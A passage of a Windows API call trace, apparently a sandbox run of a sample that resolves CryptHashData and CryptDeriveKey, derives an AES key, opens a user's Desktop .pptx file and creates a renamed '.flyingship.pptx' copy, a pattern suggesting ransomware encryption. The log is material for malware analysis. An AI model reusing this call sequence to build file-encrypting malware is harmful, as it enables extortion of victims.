1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0162.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x9b9fa0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.036] GetProcAddress (hModule=0x74f20000, lpProcName="CryptHashData") returned 0x74f2df36 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0162.036] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0162.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.038] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0162.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x9ba0f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.040] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0162.040] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0162.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0162.041] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.041] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.041] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.042] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.042] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0162.042] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.042] CryptDestroyHash (hHash=0x90af58) returned 1 [0162.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.042] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.042] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.042] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.042] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j-lwl.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0162.043] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.044] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0162.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.flyingship.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j-lwl.flyingship.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0162.048] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.048] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 